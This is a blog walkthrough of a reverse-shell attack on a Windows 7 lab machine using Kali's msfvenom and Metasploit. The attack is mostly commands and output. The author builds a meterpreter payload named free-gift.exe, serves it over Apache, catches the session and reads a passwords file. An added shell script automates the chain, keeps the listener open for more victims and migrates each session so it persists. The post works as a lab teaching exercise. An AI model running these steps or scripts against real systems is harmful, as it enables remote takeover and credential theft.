Friday, June 7, 2019

Reverse Shell Attack Using Metasploit in Kali Linux

When threat actors (hackers) gain access to a system, they usually want future access as well, and they want it to be easy. A backdoor application can be installed by the attacker either to allow future access or to collect information to use in further attacks. Many backdoors are installed by users clicking something without realizing that the link they clicked or the file they opened is a threat. Backdoors can also be dropped by a virus, worm, or other malware.

When threat actors gain access to a system, they might also be able to take several actions. The type of action depends on the level of access the threat actor has, or can achieve, and is based on the permissions granted to the account compromised by the attacker. One of the most devastating actions available to an attacker is the ability to execute code on the device. Code execution can adversely affect the confidentiality, integrity, and availability of the system or network.


root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --smallest                   Generate the smallest possible payload using all available encoders
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message


root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=1234 --format=exe > free-gift.exe      // LHOST IS KALI IP; CREATE A .exe WINDOWS PAYLOAD FILE
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

root@kali:~# ls
Desktop    Downloads      Music     Public            Templates  Videos    yersinia.log
Documents  free-gift.exe  Pictures  sshd_config.save  try2hack   websites


Run the Apache web server on Kali Linux. It will be used to serve the payload for download to the Windows 7 machine.

root@kali:~# service apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: inactive (dead)
root@kali:~#
root@kali:~# service apache2 <ENTER>      // VIEW COMMAND OPTIONS
Usage: apache2 {start|stop|graceful-stop|restart|reload|force-reload}
root@kali:~#
root@kali:~# service apache2 start
root@kali:~#
root@kali:~# service apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2018-10-17 04:58:39 EDT; 2s ago
  Process: 2278 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 2289 (apache2)
    Tasks: 7 (limit: 2344)
   Memory: 21.1M
   CGroup: /system.slice/apache2.service
           ├─2289 /usr/sbin/apache2 -k start
           ├─2290 /usr/sbin/apache2 -k start
           ├─2291 /usr/sbin/apache2 -k start
           ├─2292 /usr/sbin/apache2 -k start
           ├─2293 /usr/sbin/apache2 -k start
           ├─2294 /usr/sbin/apache2 -k start
           └─2295 /usr/sbin/apache2 -k start

Oct 17 04:58:39 kali systemd[1]: Starting The Apache HTTP Server...
Oct 17 04:58:39 kali apachectl[2278]: AH00558: apache2: Could not reliably determine the se
Oct 17 04:58:39 kali systemd[1]: Started The Apache HTTP Server.


Move the payload file (.exe) to the Apache folder:

root@kali:~# ls
Desktop    Downloads      Music     Public            Templates  Videos    yersinia.log
Documents  free-gift.exe  Pictures  sshd_config.save  try2hack   websites
root@kali:~#
root@kali:~# cp free-gift.exe /var/www/html
root@kali:~#
root@kali:~# cd /var/www/html
root@kali:/var/www/html#
root@kali:/var/www/html# ls
free-gift.exe  index.html  index.nginx-debian.html


You can also use the GUI: click Files (folder icon) > Home > copy free-gift.exe > Other locations > Computer > var > www > html



Start the PostgreSQL database that Metasploit uses before launching msfconsole. The console still starts without it (you will see connection-refused warnings, as below), but the db_* commands and session bookkeeping need it; db_status inside the console confirms whether it connected.


root@kali:~# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
   Active: inactive (dead)
root@kali:~#
root@kali:~# service postgresql start
root@kali:~#
root@kali:~# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
   Active: active (exited) since Wed 2018-10-17 05:10:46 EDT; 2s ago
  Process: 2605 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 2605 (code=exited, status=0/SUCCESS)

Oct 17 05:10:46 kali systemd[1]: Starting PostgreSQL RDBMS...
Oct 17 05:10:46 kali systemd[1]: Started PostgreSQL RDBMS.


Type msfconsole to launch the Metasploit Framework and set up the handler (listener) that will catch the connection from the Windows payload. The payload type, LHOST, and LPORT must match what was given to msfvenom.

root@kali:/var/www/html# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

[*] Starting the MetasploiT Framework console...-

[-] Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

                                                 
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.17.11-dev                         ]
+ -- --=[ 1807 exploits - 1028 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > db_status        // CHECK METASPLOIT DATABASE CONNECTION
[*] postgresql connected to msf
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.110
LHOST => 192.168.1.110
msf exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf exploit(multi/handler) > show options      // VIEW MODULE AND PAYLOAD OPTIONS

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.110    yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit -h
Usage: exploit [options]

Launches an exploitation attempt.

OPTIONS:

    -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.
    -f        Force the exploit to run regardless of the value of MinimumRank.
    -h        Help banner.
    -j        Run in the context of a job.
    -n <opt>  The NOP generator to use.  If none is specified, NOP is used.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
    -t <opt>  The target index or name to use.  If none is specified, TARGET is used.
    -z        Do not interact with the session after successful exploitation.

msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.110:1234
msf exploit(multi/handler) >
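The steps above (generate the payload with msfvenom, copy it to the Apache web root, start the services, configure and background the handler) can be scripted. The script below is an added example and is not code from the original post. It takes the post's own values (Kali at 192.168.1.110, port 1234, web root /var/www/html) as defaults; the function names, the file names handler.rc and free-gift.exe, and the "run" argument are my own. It adds two things the interactive walkthrough lacks: it validates LHOST and LPORT before generating anything (a mistyped LHOST is the usual reason a reverse shell "never calls back"), and it sets ExitOnSession to false in the handler so the listener keeps running after the first session instead of stopping. Note that the raw, unencoded x86 executable msfvenom produces here is signatured by essentially every antivirus product; this is a lab exercise, not an evasion technique.

```shell
#!/bin/sh
# Added example (not from the original post): the post's msfvenom -> Apache ->
# multi/handler procedure as reusable functions, with input checks.
# Assumptions: Kali 192.168.1.110, port 1234, web root /var/www/html (post's
# values); file names free-gift.exe and handler.rc are this example's own.
set -e

WEBROOT=/var/www/html

# Accept only a dotted-quad IPv4 address (each octet 0-255).
validate_ipv4() {
    case $1 in ''|*[!0-9.]*) return 1 ;; esac   # digits and dots only
    _ifs=$IFS; IFS=.; set -- $1; IFS=$_ifs       # split on dots
    [ $# -eq 4 ] || return 1
    for _o in "$@"; do
        [ -n "$_o" ] && [ "$_o" -le 255 ] || return 1
    done
    return 0
}

# Accept only a TCP port in 1-65535.
validate_port() {
    case $1 in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Generate the Windows reverse_tcp Meterpreter executable, exactly as in the
# post but with -o instead of a shell redirect. With DRY_RUN=1 the msfvenom
# command line is printed instead of executed.
gen_payload() {      # $1 LHOST  $2 LPORT  $3 output file
    validate_ipv4 "$1" || { echo "gen_payload: bad LHOST '$1'" >&2; return 1; }
    validate_port "$2" || { echo "gen_payload: bad LPORT '$2'" >&2; return 1; }
    set -- msfvenom -p windows/meterpreter/reverse_tcp "LHOST=$1" "LPORT=$2" -f exe -o "$3"
    if [ "${DRY_RUN:-0}" = 1 ]; then echo "$*"; else "$@"; fi
}

# msfconsole resource script equivalent to the interactive handler setup.
# ExitOnSession=false keeps the listener up after the first session, so a
# second victim (or the same one after a reboot) is caught without re-running
# exploit. AutoRunScript migrates each new session out of free-gift.exe's
# process, so the session survives the victim closing that program.
handler_rc() {       # $1 LHOST  $2 LPORT
    cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
set AutoRunScript post/windows/manage/migrate
exploit -j -z
EOF
}

# Copy the payload into the web root and print the download URL and SHA-256,
# so the file the victim fetched can be matched against what was generated.
stage_payload() {    # $1 payload path  $2 LHOST
    cp "$1" "$WEBROOT/"
    echo "URL: http://$2/$(basename "$1")"
    sha256sum "$WEBROOT/$(basename "$1")"
}

# Only touch the system when asked explicitly:  sh handler.sh run <LHOST> <LPORT>
if [ "${1:-}" = "run" ]; then
    LHOST=$2; LPORT=$3; PAYLOAD=free-gift.exe
    gen_payload "$LHOST" "$LPORT" "$PAYLOAD"
    stage_payload "$PAYLOAD" "$LHOST"
    service apache2 start
    service postgresql start
    handler_rc "$LHOST" "$LPORT" > handler.rc
    msfconsole -q -r handler.rc      # -q: no banner, -r: run the resource script
fi
```

Running `sh handler.sh run 192.168.1.110 1234` reproduces the post's state (payload served from Apache, PostgreSQL up, handler backgrounded as job 0) in one step; the msfconsole prompt then waits for sessions just as after `exploit -j -z` above.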


Go to the Windows 7 machine and download the payload from the Apache web server running on Kali. The payload could also be delivered by other social-engineering means (email attachment, USB drive, cloned website, etc.).


I simply chose to run the payload (.exe). A real threat actor (hacker) would make the file (or URL) enticing in order for the attack to succeed.


Once the victim downloaded and opened the payload, the handler caught the incoming connection and Metasploit opened a session.


msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.110:1234
msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.110:1234 -> 192.168.1.130:49222) at 2018-10-17 05:26:51 -0400

msf exploit(multi/handler) > sessions -i        // LIST ACTIVE SESSIONS

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  WIN-7V0EVV4BKQJ\Administrator @ WIN-7V0EVV4BKQJ  192.168.1.110:1234 -> 192.168.1.130:49222 (192.168.1.130)


msf exploit(multi/handler) > sessions -i 1       // INTERACT WITH SESSION 1
[*] Starting interaction with 1...


Once you've established the remote (backdoor) session, you can start reconnaissance on the machine by issuing Meterpreter commands.

meterpreter > sysinfo
Computer        : WIN-7V0EVV4BKQJ
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows


meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:6b:99:7a
MTU          : 1500
IPv4 Address : 192.168.1.130
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::104a:e373:9974:3524
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:182
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


I created a text file on the Windows 7 Desktop containing sensitive info such as usernames and passwords. Also notice that on the Windows side the netstat output shows an ESTABLISHED TCP session with Kali 192.168.1.110 on port 1234.


meterpreter > pwd       // VERIFY CURRENT DIRECTORY
C:\Users\Administrator\Desktop

meterpreter > ls      // LIST FILES
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  44    fil   2018-10-17 05:32:07 -0400  PASSWORDS.txt
100666/rw-rw-rw-  950   fil   2018-09-15 23:03:29 -0400  PuTTY.lnk
100666/rw-rw-rw-  282   fil   2018-09-15 22:50:44 -0400  desktop.ini


meterpreter > cat PASSWORDS.txt      // VIEW CONTENTS OF THE FILE
cisco   cisco123

admin   cisco

admin   admin
